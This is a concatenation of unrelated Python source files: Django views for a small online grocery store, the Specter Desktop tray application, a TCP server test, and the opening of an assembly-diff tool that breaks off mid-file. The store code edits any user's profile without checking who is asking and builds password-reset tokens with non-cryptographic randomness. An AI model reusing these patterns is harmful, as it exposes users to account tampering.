return render(request, 'market/index.html',{'data':data['data'][0] if data['data'] else {} })
class Profile(View):
def get(self, request, *args, **kwargs):
print ("Profile")
#creacion de usuarios
def post(self, request, *args, **kwargs):
_newUser = profileBackend(request)
_newUser.post()
data = _newUser.response_data
data['code'] = _newUser.code
user = authenticate(username=request.POST['email'], password=request.POST['password'])
if user:login(request, user)
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
def put(self, request, *args, **kwargs):
request.POST=QueryDict(request.read())
try:
data = {'code':200}
if request.POST['flagProfileonly'] == 'false':
dataUser = User.objects.get(pk=int(request.POST['user']))
dataUser.first_name=request.POST['name']
dataUser.last_name=request.POST['lastname']
dataProfile = ProfileDB.objects.get(user=dataUser.id)
dataProfile.phone=request.POST['phone']
dataProfile.rif=request.POST['rif']
dataUser.save()
dataProfile.save()
else:
dataProfile = ProfileDB.objects.get(user=User.objects.get(pk=int(request.POST['user'])))
dataProfile.direction=request.POST['direction']
dataProfile.localphone=request.POST['localphone']
dataProfile.reference=request.POST['reference']
dataProfile.save()
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
except Exception as e:
print (e)
data = {'code':500}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
#Seccion de Administrador
class ControlAdmin(View):
def get(self, request, *args, **kwargs):
if str(request.user) != 'AnonymousUser':#si esta logeado su data
_allproductsfilter = adminSite(request)
_allproductsfilter.dataProductUser()
data = _allproductsfilter.response_data
data['code'] = _allproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/adminGestion.html', {'direction':direction,'data':contacts,'flag':'all'})
else: # registro
return render(request, 'market/adminIndex.html', {})
#Fin de la Seccion de Administrador
def Conditions(request):
return render(request, 'market/conditions.html', {})
def Help(request):
return render(request, 'market/help.html', {})
def We(request):
return render(request, 'market/we.html', {})
def Places(request):
return render(request, 'market/places.html', {})
def Payment(request):
return render(request, 'market/payment.html', {})
def Delivery(request):
return render(request, 'market/delivery.html', {})
####CARRITO DE COMPRAS#####
def CartShopping(request):
if str(request.user) != 'AnonymousUser':#si esta logeado su data
try:
dataUser = User.objects.get(email=request.user)
return render(request, 'market/cartshopping.html', {
'name':dataUser.first_name,
'apellido':dataUser.last_name,
'phone':dataUser.user_profile.phone,
'direction':dataUser.user_profile.direction,
'rif':dataUser.user_profile.rif,
'localphone':dataUser.user_profile.localphone,
'reference':dataUser.user_profile.reference,
'costoenvio':Tools.objects.all().first().costoenvio,
'code':200
})
except Exception as e:
print (e)
return render(request, 'market/cartshopping.html', {'costoenvio':Tools.objects.all().first().costoenvio})
else:
try:
return render(request, 'market/cartshopping.html', {'costoenvio':Tools.objects.all().first().costoenvio})
except Tools.DoesNotExist:
data = {'costoenvio':config.COSTO_ENVIO,'create_at':datetime.datetime.now()}
costo = Tools(**data)
costo.save()
return HttpResponseRedirect("/")
#Section Filters
def AllProducts(request):
_allproductsfilter = filterProducts(request)
_allproductsfilter.allProductsFilter()
data = _allproductsfilter.response_data
data['code'] = _allproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/allProducts.html',{'direction':direction,'contacts':contacts,'data':json.dumps(data['data'])})
def ViveresProducts(request):
_viveresproductsfilter = filterProducts(request)
_viveresproductsfilter.viveresProductsFilter()
data = _viveresproductsfilter.response_data
data['code'] = _viveresproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/viveresProducts.html',{'direction':direction,'contacts':contacts,'data':json.dumps(data['data'])})
def FrigorificoProducts(request):
_frigorificoproductsfilter = filterProducts(request)
_frigorificoproductsfilter.frigorificoProductsFilter()
data = _frigorificoproductsfilter.response_data
data['code'] = _frigorificoproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/frigorificoProducts.html',{'direction':direction,'contacts':contacts,'data':json.dumps(data['data'])})
def EnlatadosProducts(request):
_enlatadosproductsfilter = filterProducts(request)
_enlatadosproductsfilter.enlatadosProductsFilter()
data = _enlatadosproductsfilter.response_data
data['code'] = _enlatadosproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/enlatadosProducts.html',{'direction':direction,'contacts':contacts,'data':json.dumps(data['data'])})
#Section Filter Prodcuts Admin
def AllProductsAdmin(request):
if str(request.user) != 'AnonymousUser':#si esta logeado su data
_allproductsfilter = adminSite(request)
_allproductsfilter.dataProductUser()
data = _allproductsfilter.response_data
data['code'] = _allproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/adminGestion.html', {'direction':direction,'data':contacts,'flag':'all'})
else:
return render(request, 'market/adminIndex.html', {})
def ViveresProductsAdmin(request):
if str(request.user) != 'AnonymousUser':#si esta logeado su data
_viveresproductsfilter = adminSite(request)
_viveresproductsfilter.viveresProductsFilterAdmin()
data = _viveresproductsfilter.response_data
data['code'] = _viveresproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/adminGestion.html', {'direction':direction,'data':contacts,'flag':'vive'})
else:
return render(request, 'market/adminIndex.html', {})
def FrigorificoProductsAdmin(request):
if str(request.user) != 'AnonymousUser':#si esta logeado su data
_frigorificoproductsfilter = adminSite(request)
_frigorificoproductsfilter.frigorificoProductsFilterAdmin()
data = _frigorificoproductsfilter.response_data
data['code'] = _frigorificoproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/adminGestion.html', {'direction':direction,'data':contacts,'flag':'frigo'})
else:
return render(request, 'market/adminIndex.html', {})
def EnlatadosProductsAdmin(request):
if str(request.user) != 'AnonymousUser':#si esta logeado su data
_enlatadosproductsfilter = adminSite(request)
_enlatadosproductsfilter.enlatadosProductsFilterAdmin()
data = _enlatadosproductsfilter.response_data
data['code'] = _enlatadosproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/adminGestion.html', {'direction':direction,'data':contacts,'flag':'enla'})
else:
return render(request, 'market/adminIndex.html', {})
#Caja
def CartOrder(request):
data = {}
if str(request.user) != 'AnonymousUser':#si esta logeado su data
try:
dataUser = User.objects.get(email=request.user)
data = {
'user':dataUser.id,
'name':dataUser.first_name,
'email':dataUser.email,
'apellido':dataUser.last_name,
'phone':dataUser.user_profile.phone,
'direction':dataUser.user_profile.direction,
'rif':dataUser.user_profile.rif,
'localphone':dataUser.user_profile.localphone,
'reference':dataUser.user_profile.reference,
'costoenvio':Tools.objects.all().first().costoenvio,
'code':200
}
except Exception as e:
print (e)
return render(request, 'market/order.html',data)
#confirmacioncompra
def ConfimationOrder(request):
if str(request.user) == 'AnonymousUser':
return render(request, 'market/registerLogin.html', {})
dataUser = User.objects.get(email=request.user)
data = {
'user':dataUser.id,
'name':dataUser.first_name,
'email':dataUser.email,
'costoenvio':Tools.objects.all().firts().costoenvio,
'code':200,
'compra':[],
'tipoPago':'',
}
compra = PurchaseConfirmation.objects.filter(user=dataUser).last()
allProducts = PurchaseConfirmation.objects.filter(code=compra.code)
totalGeneral=0
for value in allProducts:
data['tipoPago'] = value.payment_type
data['code'] = value.code
data['compra'].append({
'name':value.product.name,
'price':str(value.product.price)+' / '+str(value.cant_product),
'image':value.product.image,
'total':float(value.product.price)*int(value.cant_product),
})
totalGeneral = totalGeneral+(float(value.product.price)*int(value.cant_product))
data['totalGeneral'] = totalGeneral
data['totalCompleto'] = data['totalGeneral']+data['costoenvio']
return render(request, 'market/confirmationOrder.html',data)
#envio de formulario de ayuda
def HelpForm(request):
def hilo():
try:
msg_html = render_to_string('market/emailHelp.html',
{
'asunto':request.POST.get('asunto','') ,
'mensaje':request.POST.get('mensaje',''),
'email':request.POST.get('email','')
})
send_mail(
'Ayuda, Criollitos Market',
'formulario de ayuda',
settings.EMAIL_HOST_USER,#from
[request.POST.get('email','')],#to
html_message=msg_html,
)
except Exception as e:
print ('e',e)
thread = Thread(target = hilo)
thread.start()
data = {'code':200}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
def CartOrderEntrega(request):
if str(request.user) == 'AnonymousUser':
return render(request, 'market/registerLogin.html', {})
data = {}
_allproducts = backStart(request)
_allproducts.guardaCompra()
data['code'] = _allproducts.code
if data['code'] !=500:
data = {'code':200}
else:
data = {'code':500,'message':'Error al procesar su compra'}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
#pagina de recuperacion de clave
def Restore(request):
return render(request, 'market/restore.html', {})
#envio de recuperacion de clave
def Forgot(request):
try:
dataUser = User.objects.get(email=request.POST['email'])
########################codigo de seguridad de cambio de clave##########
def ran_gen(size, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
tokenCode = ran_gen(30,"abcdefghijkLmnNopqrstuvwxyz0123456789./*-")
########################################################################
try:
token = TokenPassword.objects.get(user=dataUser)
token.token = tokenCode
except Exception as e:
dataToke = {'token':tokenCode,'user':dataUser}
token = TokenPassword(**dataToke)
token.save()
def forgotPassword():
try:
msg_html = render_to_string('market/forgotPassword.html',
{
'email':request.POST.get('email',''),
'token':tokenCode,
})
send_mail(
'Recuperar Clave',
'siga los pasos',
settings.EMAIL_HOST_USER,#from
[request.POST.get('email','')],#to
html_message=msg_html,
)
except Exception as e:
print ('e',e)
thread = Thread(target = forgotPassword)
thread.start()
data = {'code':200}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
except Exception as e:
print (e)
data = {'code':500,'message':'Email no existe'}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
def ForgotMail(request):
if 'token' in request.GET:
return render(request, 'market/forgotPasswordFinal.html', {'token':request.GET['token']})
else:
print ("poner un pagina de rebotado")
def Detail(request):
if 'code' in request.GET:
_detailproducts = backStart(request)
_detailproducts.detailProducts()
data = _detailproducts.response_data
return render(request, 'market/detailProduct.html', {'data':data['data'],'data2':data['data2'][0]})
else:
data = {'code':500,'message':'Codigo invalido'}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
|
specter_desktop.py | from PyQt5.QtGui import QIcon, QCursor, QDesktopServices
from PyQt5.QtWidgets import (
QApplication,
QSystemTrayIcon,
QMenu,
QAction,
QDialog,
QDialogButtonBox,
QVBoxLayout,
QRadioButton,
QLineEdit,
QFileDialog,
QLabel,
QWidget,
)
from PyQt5.QtCore import (
QRunnable,
QThreadPool,
QSettings,
QUrl,
Qt,
pyqtSignal,
pyqtSlot,
QObject,
QSize,
QPoint,
QEvent,
)
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEnginePage
import sys
import os
import subprocess
import webbrowser
import json
import platform
import time
import signal
import requests
from cryptoadvance.specter.config import DATA_FOLDER
from cryptoadvance.specter.helpers import deep_update
from cryptoadvance.specter.cli import server
import threading
running = True
path = os.path.dirname(os.path.abspath(__file__))
is_specterd_running = False
specterd_thread = None
settings = QSettings("cryptoadvance", "specter")
wait_for_specterd_process = None
def resource_path(relative_path):
try:
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
class SpecterPreferencesDialog(QDialog):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setWindowTitle("Specter Preferences")
self.layout = QVBoxLayout()
QBtn = QDialogButtonBox.Save | QDialogButtonBox.Cancel
self.buttonBox = QDialogButtonBox(QBtn)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
# Mode setting
self.mode_local = QRadioButton("Run Local Specter Server")
self.mode_local.toggled.connect(self.toggle_mode)
self.mode_remote = QRadioButton("Use a Remote Specter Server")
self.mode_remote.toggled.connect(self.toggle_mode)
self.specter_url = QLineEdit(
placeholderText="Please enter the remote Specter URL"
)
is_remote_mode = settings.value("remote_mode", defaultValue=False, type=bool)
if is_remote_mode:
self.mode_remote.setChecked(True)
else:
self.mode_local.setChecked(True)
self.specter_url.hide()
settings.setValue("remote_mode_temp", is_remote_mode)
remote_specter_url = (
settings.value("specter_url", defaultValue="", type=str)
if is_remote_mode
else ""
)
settings.setValue("specter_url_temp", remote_specter_url)
self.specter_url.setText(remote_specter_url)
self.specter_url.textChanged.connect(
lambda: settings.setValue("specter_url_temp", self.specter_url.text())
)
self.layout.addWidget(self.mode_local)
self.layout.addWidget(self.mode_remote)
self.layout.addWidget(self.specter_url)
self.layout.addWidget(self.buttonBox)
self.resize(500, 180)
self.setLayout(self.layout)
def toggle_mode(self):
if self.mode_local.isChecked():
settings.setValue("remote_mode_temp", False)
self.specter_url.hide()
else:
settings.setValue("remote_mode_temp", True)
self.specter_url.show()
# Cross communication between threads via signals
# https://www.learnpyqt.com/courses/concurrent-execution/multithreading-pyqt-applications-qthreadpool/
class ProcessSignals(QObject):
error = pyqtSignal()
result = pyqtSignal()
class ProcessRunnable(QRunnable):
def __init__(self, menu):
super().__init__()
self.menu = menu
self.signals = ProcessSignals()
@pyqtSlot()
def run(self):
menu = self.menu
start_specterd_menu = menu.actions()[0]
start_specterd_menu.setEnabled(False)
start_specterd_menu.setText(
"Starting up Specter{} daemon...".format(
" HWIBridge"
if settings.value("remote_mode", defaultValue=False, type=bool)
else ""
)
)
while running:
is_remote_mode = settings.value(
"remote_mode", defaultValue=False, type=bool
)
try:
if is_remote_mode:
requests.get(
"http://localhost:25441/hwi/settings", allow_redirects=False
)
else:
requests.get("http://localhost:25441/login", allow_redirects=False)
start_specterd_menu.setText(
"Specter{} daemon is running".format(
" HWIBridge"
if settings.value("remote_mode", defaultValue=False, type=bool)
else ""
)
)
toggle_specterd_status(menu)
self.signals.result.emit()
return
except:
pass
time.sleep(0.1)
def start(self):
QThreadPool.globalInstance().start(self)
def watch_specterd(menu, view, first_time=False):
global specterd_thread, wait_for_specterd_process
try:
wait_for_specterd_process = ProcessRunnable(menu)
wait_for_specterd_process.signals.result.connect(
lambda: open_webview(view, first_time)
)
wait_for_specterd_process.signals.error.connect(lambda: print("error"))
wait_for_specterd_process.start()
except Exception as e:
print("* Failed to start Specter daemon {}".format(e))
def open_specter_window():
webbrowser.open(settings.value("specter_url", type=str), new=1)
def toggle_specterd_status(menu):
global is_specterd_running
start_specterd_menu = menu.actions()[0]
open_webview_menu = menu.actions()[1]
open_browser_menu = menu.actions()[2]
if is_specterd_running:
start_specterd_menu.setEnabled(False)
open_webview_menu.setEnabled(True)
open_browser_menu.setEnabled(True)
else:
start_specterd_menu.setText(
"Start Specter{} daemon".format(
" HWIBridge"
if settings.value("remote_mode", defaultValue=False, type=bool)
else ""
)
)
start_specterd_menu.setEnabled(True)
open_webview_menu.setEnabled(False)
open_browser_menu.setEnabled(False)
is_specterd_running = not is_specterd_running
def quit_specter(app):
global running
running = False
app.quit()
def open_settings():
dlg = SpecterPreferencesDialog()
if dlg.exec_():
is_remote_mode = settings.value(
"remote_mode_temp", defaultValue=False, type=bool
)
settings.setValue("remote_mode", is_remote_mode)
specter_url_temp = settings.value(
"specter_url_temp", defaultValue="http://localhost:25441/", type=str
)
if not specter_url_temp.endswith("/"):
specter_url_temp += "/"
# missing schema?
if "://" not in specter_url_temp:
specter_url_temp = "http://" + specter_url_temp
settings.setValue(
"specter_url",
specter_url_temp if is_remote_mode else "http://localhost:25441/",
)
hwibridge_settings_path = os.path.join(
os.path.expanduser(DATA_FOLDER), "hwi_bridge_config.json"
)
if is_remote_mode:
config = {"whitelisted_domains": "http://127.0.0.1:25441/"}
if os.path.isfile(hwibridge_settings_path):
with open(hwibridge_settings_path, "r") as f:
file_config = json.loads(f.read())
deep_update(config, file_config)
with open(hwibridge_settings_path, "w") as f:
if "whitelisted_domains" in config:
whitelisted_domains = ""
if specter_url_temp not in config["whitelisted_domains"].split():
config["whitelisted_domains"] += " " + specter_url_temp
for url in config["whitelisted_domains"].split():
if not url.endswith("/") and url != "*":
# make sure the url end with a "/"
url += "/"
whitelisted_domains += url.strip() + "\n"
config["whitelisted_domains"] = whitelisted_domains
f.write(json.dumps(config, indent=4))
# TODO: Add PORT setting
def open_webview(view, first_time=False):
url = settings.value("specter_url", type=str).strip("/")
if first_time and settings.value("remote_mode", defaultValue=False, type=bool):
url += "/settings/hwi"
# missing schema?
if "://" not in url:
url = "http://" + url
# if https:// or .onion - use browser
if "https://" in url or ".onion" in url:
webbrowser.open(settings.value("specter_url", type=str), new=1)
return
if not view.isVisible():
view.load(QUrl(url))
view.show()
# if the window is already open just bring it to top
# hack to make it pop-up
else:
view.show()
getattr(view, "raise")()
view.activateWindow()
class WebEnginePage(QWebEnginePage):
"""Web page"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.featurePermissionRequested.connect(self.onFeaturePermissionRequested)
self.profile().downloadRequested.connect(self.onDownloadRequest)
def onFeaturePermissionRequested(self, url, feature):
"""Enable camera and other stuff"""
# allow everything
self.setFeaturePermission(url, feature, QWebEnginePage.PermissionGrantedByUser)
def onDownloadRequest(self, item):
"""Catch dowload files requests"""
options = QFileDialog.Options()
path = QFileDialog.getSaveFileName(
None, "Where to save?", item.path(), options=options
)[0]
if path:
item.setPath(path)
item.accept()
def createWindow(self, _type):
"""
Catch clicks on _blank urls
and open it in default browser
"""
page = WebEnginePage(self)
page.urlChanged.connect(self.open_browser)
return page
def open_browser(self, url):
page = self.sender()
QDesktopServices.openUrl(url)
page.deleteLater()
class WebView(QWidget):
"""Window with the web browser"""
def __init__(self, tray, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setStyleSheet("background-color:#263044;")
self.tray = tray
self.browser = QWebEngineView()
self.browser.page = WebEnginePage()
self.browser.setPage(self.browser.page)
# loading progress widget
self.progress = QWidget()
self.progress.setFixedHeight(1)
self.progress.setStyleSheet("background-color:#263044;")
vbox = QVBoxLayout()
vbox.addWidget(self.progress, stretch=0)
vbox.addWidget(self.browser)
vbox.setSpacing(0)
vbox.setContentsMargins(0, 0, 0, 0)
self.setLayout(vbox)
self.resize(settings.value("size", QSize(1200, 900)))
self.move(settings.value("pos", QPoint(50, 50)))
self.browser.loadStarted.connect(self.loadStartedHandler)
self.browser.loadProgress.connect(self.loadProgressHandler)
self.browser.loadFinished.connect(self.loadFinishedHandler)
self.browser.urlChanged.connect(self.loadFinishedHandler)
self.setWindowTitle("Specter Desktop")
def load(self, *args, **kwargs):
self.browser.load(*args, **kwargs)
def loadStartedHandler(self):
"""Set waiting cursor when the page is loading"""
QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
def loadProgressHandler(self, progress):
# just changes opacity over time for now
alpha = int(time.time() * 100) % 100
self.progress.setStyleSheet(f"background-color:rgba(75,140,26,{alpha});")
def loadFinishedHandler(self, *args, **kwargs):
"""Recover cursor when done"""
self.progress.setStyleSheet("background-color:#263044;")
QApplication.restoreOverrideCursor()
def closeEvent(self, *args, **kwargs):
"""
Notify about tray app when window is closed
for the first time.
Also save geometry of the window.
"""
settings.setValue("size", self.size())
settings.setValue("pos", self.pos())
if settings.value("first_time_close", defaultValue=True, type=bool):
settings.setValue("first_time_close", False)
self.tray.showMessage(
"Specter is still running!",
"Use tray icon to quit or reopen",
self.tray.icon(),
)
super().closeEvent(*args, **kwargs)
class Application(QApplication):
def event(self, event):
# not sure what 20 means
if event and event.type() in [QEvent.Close, 20]:
quit_specter(self)
return False
def init_desktop_app():
app = Application([])
app.setQuitOnLastWindowClosed(False)
def sigint_handler(*args):
"""Handler for the SIGINT signal."""
quit_specter(app)
# fix termination ctrl+c
signal.signal(signal.SIGINT, sigint_handler)
# This is the place to uncomment if we ever have issues like
# https://github.com/cryptoadvance/specter-desktop/issues/373 again
# So maybe let's keep it in here.
if os.environ.get("DEP_REPORTING"):
import psutil
print(
"---------------------------DEP_REPORTING--------------------------------------------"
)
for item in psutil.Process().memory_maps():
print(item.path)
print(
"-----------------------------DEP_REPORTING(end)-------------------------------------"
)
# Create the icon
icon = QIcon(os.path.join(resource_path("icons"), "icon.png"))
# Create the tray
tray = QSystemTrayIcon()
tray.setIcon(icon)
tray.setVisible(True)
# Create webview
view = WebView(tray)
# Create the menu
menu = QMenu()
start_specterd_menu = QAction(
"Start Specter{} daemon".format(
" HWIBridge"
if settings.value("remote_mode", defaultValue=False, type=bool)
else ""
)
)
start_specterd_menu.triggered.connect(lambda: watch_specterd(menu, view))
menu.addAction(start_specterd_menu)
open_webview_menu = QAction("Open Specter App")
open_webview_menu.triggered.connect(lambda: open_webview(view))
menu.addAction(open_webview_menu)
open_specter_menu = QAction("Open in the browser")
open_specter_menu.triggered.connect(open_specter_window)
menu.addAction(open_specter_menu)
toggle_specterd_status(menu)
open_settings_menu = QAction("Preferences")
open_settings_menu.triggered.connect(open_settings)
menu.addAction(open_settings_menu)
# Add a Quit option to the menu.
quit = QAction("Quit")
quit.triggered.connect(lambda: quit_specter(app))
menu.addAction(quit)
# Add the menu to the tray
tray.setContextMenu(menu)
app.setWindowIcon(icon)
# Setup settings
first_time = settings.value("first_time", defaultValue=True, type=bool)
if first_time:
settings.setValue("first_time", False)
settings.setValue("remote_mode", False)
settings.setValue("specter_url", "http://localhost:25441/")
open_settings()
# start server
global specterd_thread
# add hwibridge to args
if settings.value("remote_mode", defaultValue=False, type=bool):
sys.argv.append("--hwibridge")
# start thread
specterd_thread = threading.Thread(target=server)
specterd_thread.daemon = True
specterd_thread.start()
watch_specterd(menu, view)
sys.exit(app.exec_())
if __name__ == "__main__":
init_desktop_app()
|
test_serverapp.py | import sys
sys.path.append("yam")
sys.path.append("../../yam")
from serverapp import YamTcpServer
from devices import DeviceWatcher
from player import RemoteClient
import config as config
import serverapp
import time
import SocketServer
import threading
request_received = False
answer = None
tcpServer = None
tcpServerReallyBroadcastedItsPresence = False
class TestServerApp:
config.setConfigFolder('tests/config/')
request_received_confirmed = False
def test_server_default_setup(self):
pass
server = serverapp.setupTestServer()
global tcpServer
tcpServer = server
t = threading.Thread(target=self.send_requests_and_quit, name="reqsender")
t.start()
watcher = DeviceWatcher(callback=self.device_watcher_callback)
watcher.start()
tcpServer.start()
watcher.stop()
global tcpServerReallyBroadcastedItsPresence
assert tcpServerReallyBroadcastedItsPresence
def send_requests_and_quit(self):
time.sleep(1)
global tcpServer
ip, port = tcpServer.tcpServer.server_address
self.requestSender = RemoteClient("{0}:{1}".format(ip, port),callback=self.on_request_callback)
self.request = "player;getState\n"
self.requestSender.sendRequest(self.request)
return
def on_request_callback(self, answer):
global tcpServer
assert answer and len(answer) > 0 and answer == "STOPPED"
tcpServer.stop()
def device_watcher_callback(self, device):
global tcpServerReallyBroadcastedItsPresence
tcpServerReallyBroadcastedItsPresence = True
global tcpServer
assert tcpServer.device == device
|
diff.py | #!/usr/bin/env python3
# PYTHON_ARGCOMPLETE_OK
import argparse
import sys
from typing import (
Any,
Callable,
Dict,
Iterator,
List,
Match,
NoReturn,
Optional,
Pattern,
Set,
Tuple,
Type,
Union,
)
def fail(msg: str) -> NoReturn:
print(msg, file=sys.stderr)
sys.exit(1)
def static_assert_unreachable(x: NoReturn) -> NoReturn:
raise Exception("Unreachable! " + repr(x))
# ==== COMMAND-LINE ====
if __name__ == "__main__":
# Prefer to use diff_settings.py from the current working directory
sys.path.insert(0, ".")
try:
import diff_settings
except ModuleNotFoundError:
fail("Unable to find diff_settings.py in the same directory.")
sys.path.pop(0)
try:
import argcomplete
except ModuleNotFoundError:
argcomplete = None
parser = argparse.ArgumentParser(
description="Diff MIPS, PPC, AArch64, or ARM32 assembly."
)
start_argument = parser.add_argument(
"start",
help="Function name or address to start diffing from.",
)
if argcomplete:
def complete_symbol(
prefix: str, parsed_args: argparse.Namespace, **kwargs: object
) -> List[str]:
if not prefix or prefix.startswith("-"):
# skip reading the map file, which would
# result in a lot of useless completions
return []
config: Dict[str, Any] = {}
diff_settings.apply(config, parsed_args) # type: ignore
mapfile = config.get("mapfile")
if not mapfile:
return []
completes = []
with open(mapfile) as f:
data = f.read()
# assume symbols are prefixed by a space character
search = f" {prefix}"
pos = data.find(search)
while pos != -1:
# skip the space character in the search string
pos += 1
# assume symbols are suffixed by either a space
# character or a (unix-style) line return
spacePos = data.find(" ", pos)
lineReturnPos = data.find("\n", pos)
if lineReturnPos == -1:
endPos = spacePos
elif spacePos == -1:
endPos = lineReturnPos
else:
endPos = min(spacePos, lineReturnPos)
if endPos == -1:
match = data[pos:]
pos = -1
else:
match = data[pos:endPos]
pos = data.find(search, endPos)
completes.append(match)
return completes
setattr(start_argument, "completer", complete_symbol)
parser.add_argument(
"end",
nargs="?",
help="Address to end diff at.",
)
parser.add_argument(
"-o",
dest="diff_obj",
action="store_true",
help="""Diff .o files rather than a whole binary. This makes it possible to
see symbol names. (Recommended)""",
)
parser.add_argument(
"-e",
"--elf",
dest="diff_elf_symbol",
metavar="SYMBOL",
help="""Diff a given function in two ELFs, one being stripped and the other
one non-stripped. Requires objdump from binutils 2.33+.""",
)
parser.add_argument(
"-c",
"--source",
dest="show_source",
action="store_true",
help="Show source code (if possible). Only works with -o or -e.",
)
parser.add_argument(
"-C",
"--source-old-binutils",
dest="source_old_binutils",
action="store_true",
help="""Tweak --source handling to make it work with binutils < 2.33.
Implies --source.""",
)
parser.add_argument(
"-L",
"--line-numbers",
dest="show_line_numbers",
action="store_const",
const=True,
help="""Show source line numbers in output, when available. May be enabled by
default depending on diff_settings.py.""",
)
parser.add_argument(
"--no-line-numbers",
dest="show_line_numbers",
action="store_const",
const=False,
help="Hide source line numbers in output.",
)
parser.add_argument(
"--inlines",
dest="inlines",
action="store_true",
help="Show inline function calls (if possible). Only works with -o or -e.",
)
parser.add_argument(
"--base-asm",
dest="base_asm",
metavar="FILE",
help="Read assembly from given file instead of configured base img.",
)
parser.add_argument(
"--write-asm",
dest="write_asm",
metavar="FILE",
help="Write the current assembly output to file, e.g. for use with --base-asm.",
)
parser.add_argument(
"-m",
"--make",
dest="make",
action="store_true",
help="Automatically run 'make' on the .o file or binary before diffing.",
)
parser.add_argument(
"-l",
"--skip-lines",
dest="skip_lines",
metavar="LINES",
type=int,
default=0,
help="Skip the first LINES lines of output.",
)
parser.add_argument(
"-s",
"--stop-jr-ra",
dest="stop_jrra",
action="store_true",
help="""Stop disassembling at the first 'jr ra'. Some functions have
multiple return points, so use with care!""",
)
parser.add_argument(
"-i",
"--ignore-large-imms",
dest="ignore_large_imms",
action="store_true",
help="Pretend all large enough immediates are the same.",
)
parser.add_argument(
"-I",
"--ignore-addr-diffs",
dest="ignore_addr_diffs",
action="store_true",
help="Ignore address differences. Currently only affects AArch64 and ARM32.",
)
parser.add_argument(
"-B",
"--no-show-branches",
dest="show_branches",
action="store_false",
help="Don't visualize branches/branch targets.",
)
parser.add_argument(
"-S",
"--base-shift",
dest="base_shift",
metavar="N",
type=str,
default="0",
help="""Diff position N in our img against position N + shift in the base img.
Arithmetic is allowed, so e.g. |-S "0x1234 - 0x4321"| is a reasonable
flag to pass if it is known that position 0x1234 in the base img syncs
up with position 0x4321 in our img. Not supported together with -o.""",
)
parser.add_argument(
"-w",
"--watch",
dest="watch",
action="store_true",
help="""Automatically update when source/object files change.
Recommended in combination with -m.""",
)
parser.add_argument(
"-3",
"--threeway=prev",
dest="threeway",
action="store_const",
const="prev",
help="""Show a three-way diff between target asm, current asm, and asm
prior to -w rebuild. Requires -w.""",
)
parser.add_argument(
"-b",
"--threeway=base",
dest="threeway",
action="store_const",
const="base",
help="""Show a three-way diff between target asm, current asm, and asm
when diff.py was started. Requires -w.""",
)
parser.add_argument(
"--width",
dest="column_width",
metavar="COLS",
type=int,
default=50,
help="Sets the width of the left and right view column.",
)
parser.add_argument(
"--algorithm",
dest="algorithm",
default="levenshtein",
choices=["levenshtein", "difflib"],
help="""Diff algorithm to use. Levenshtein gives the minimum diff, while difflib
aims for long sections of equal opcodes. Defaults to %(default)s.""",
)
parser.add_argument(
"--max-size",
"--max-lines",
metavar="LINES",
dest="max_lines",
type=int,
default=1024,
help="The maximum length of the diff, in lines.",
)
parser.add_argument(
"--no-pager",
dest="no_pager",
action="store_true",
help="""Disable the pager; write output directly to stdout, then exit.
Incompatible with --watch.""",
)
parser.add_argument(
"--format",
choices=("color", "plain", "html", "json"),
default="color",
help="Output format, default is color. --format=html or json implies --no-pager.",
)
parser.add_argument(
"-U",
"--compress-matching",
metavar="N",
dest="compress_matching",
type=int,
help="""Compress streaks of matching lines, leaving N lines of context
around non-matching parts.""",
